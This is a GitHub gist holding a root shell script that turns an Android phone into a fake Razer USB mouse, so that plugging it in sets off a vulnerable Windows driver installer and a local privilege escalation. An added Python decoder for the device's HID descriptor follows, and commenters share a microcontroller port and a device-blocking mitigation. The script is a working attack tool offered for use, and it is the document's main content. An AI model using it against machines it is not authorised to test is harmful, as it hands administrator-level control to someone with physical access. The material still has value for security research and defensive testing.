@tothi
Created August 22, 2021 09:52
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
# work as root
su
# enable CONFIGFS
mount -t configfs none /sys/kernel/config
# create gadget
mkdir /sys/kernel/config/usb_gadget/pwn_razer
cd /sys/kernel/config/usb_gadget/pwn_razer
# set vendor (Razer) & product id
# for a list of suitable devices see the inf files in driver cab archive
# (feel free to change the product id)
echo 0x1532 > idVendor
echo 0x023e > idProduct
# set USB version 2
echo 0x0200 > bcdUSB
# set device class to Misc / Interface Association Descriptor
echo 0xEF > bDeviceClass
echo 0x02 > bDeviceSubClass
echo 0x01 > bDeviceProtocol
# set some info strings
mkdir -p strings/0x409
echo "deadbeefdeadbeef" > strings/0x409/serialnumber
echo "an0n" > strings/0x409/manufacturer
echo "fake Razer device" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "basic Multi-function device with single TLC (MI_02)" > configs/c.1/strings/0x409/configuration
# set some fake power config values
echo 250 > configs/c.1/MaxPower
echo 0x80 > configs/c.1/bmAttributes
# add 3 mouse HID devices (protocol 2) with a basic HID report descriptor
for i in g1 g2 g3 ; do
mkdir -p functions/hid.${i}
echo 2 > functions/hid.${i}/protocol
echo 6 > functions/hid.${i}/report_length
echo BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUCgQaVAnUIgQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkwCTEVACb/f5UCdRCBAsDA | base64 -d > functions/hid.${i}/report_desc
done
# activate the HID devices
for i in g1 g2 g3 ; do
ln -s functions/hid.${i} configs/c.1/
done
# bind (for activating, disable default gadget and enable the new one)
# might need to be changed (if the active gadget is not in ../g1)
echo "" > ../g1/UDC ; getprop sys.usb.controller > UDC
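Added example, not part of the gist: a small Python decoder for the report_desc blob the script writes, so a reviewer can see what the emulated gadget declares to the host (two mouse collections, Report IDs 1 and 2) and check that the largest Input report is 6 bytes, the value the script writes to report_length. Item names follow the HID 1.11 spec; only short items are handled, which is all this descriptor uses.

```python
import base64
# The descriptor blob from the gist: the base64 the script pipes into
# functions/hid.<name>/report_desc, decoded here for inspection.
REPORT_DESC = base64.b64decode(
    "BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUCgQaVAnUI"
    "gQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkwCTEVACb/f5UCdRCB"
    "AsDA"
)
# Short-item names keyed by (item type, tag); enough for this descriptor.
NAMES = {
    (0, 0x8): "Input", (0, 0xA): "Collection", (0, 0xC): "End Collection",
    (1, 0x0): "Usage Page", (1, 0x1): "Logical Minimum", (1, 0x2): "Logical Maximum",
    (1, 0x7): "Report Size", (1, 0x8): "Report ID", (1, 0x9): "Report Count",
    (2, 0x0): "Usage", (2, 0x1): "Usage Minimum", (2, 0x2): "Usage Maximum",
}

def parse_items(desc):
    """Yield (item_type, tag, raw value) per short item (HID 1.11, section 6.2.2.2)."""
    i = 0
    while i < len(desc):
        prefix = desc[i]
        if prefix == 0xFE:
            raise ValueError("long items are not handled")
        size = (0, 1, 2, 4)[prefix & 0x3]
        data = desc[i + 1:i + 1 + size]
        if len(data) != size:
            raise ValueError("truncated descriptor")
        yield (prefix >> 2) & 0x3, prefix >> 4, int.from_bytes(data, "little")
        i += 1 + size

def describe(desc):
    """Readable item list, e.g. 'Usage Page (0x1)'; values are shown raw and unsigned."""
    return [f"{NAMES.get((t, tag), f'type{t}/tag{tag:#x}')} ({v:#x})"
            for t, tag, v in parse_items(desc)]

def report_lengths(desc):
    """Bytes per Input report, including the Report ID prefix byte when IDs are used."""
    size = count = rid = 0
    bits = {}
    for t, tag, v in parse_items(desc):
        if t == 1 and tag == 0x7: size = v      # global: Report Size
        elif t == 1 and tag == 0x9: count = v   # global: Report Count
        elif t == 1 and tag == 0x8: rid = v     # global: Report ID
        elif t == 0 and tag == 0x8:             # main: Input
            bits[rid] = bits.get(rid, 0) + size * count
    return {r: (b + 7) // 8 + (1 if r else 0) for r, b in bits.items()}

if __name__ == "__main__":
    print("\n".join(describe(REPORT_DESC)))
    print(report_lengths(REPORT_DESC))  # {1: 6, 2: 6}: matches report_length=6 in the script
```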
@memerememe

Any way I can test this out on a VM without it auto-executing on my PC?

@synap5e

synap5e commented Aug 25, 2021

Got my microcontroller working to trigger + automate this

pwn.mp4

@synap5e

synap5e commented Aug 25, 2021

Any way I can test this out on a VM without it auto-executing on my PC?

Should be able to use a USB filter in the VM's USB settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host, e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices for USB\VID_1532

@tothi
Author

tothi commented Aug 25, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

awesome! :)

@memerememe

Any way I can test this out on a VM without it auto-executing on my PC?

Should be able to use a USB filter in the VM's USB settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host, e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices for USB\VID_1532

Thank you!!

@uraninite

Got my microcontroller working to trigger + automate this
pwn.mp4

😮

@w0rm12

w0rm12 commented Aug 27, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

@synap5e

synap5e commented Sep 7, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

Sorry about the delay.
https://github.com/synap5e/razor-eop-XIAO

@linguine2552

lol, it even works with just basic PID and VID pairing for P4wnP1.
pwntemp

fyi > Razer patched spawning a simple shell.

@bananabr

bananabr commented Apr 1, 2024

I know it's been a while, but is this still supposed to work? I know the vulnerability is patched by now, but I can't even make the co-installer run.
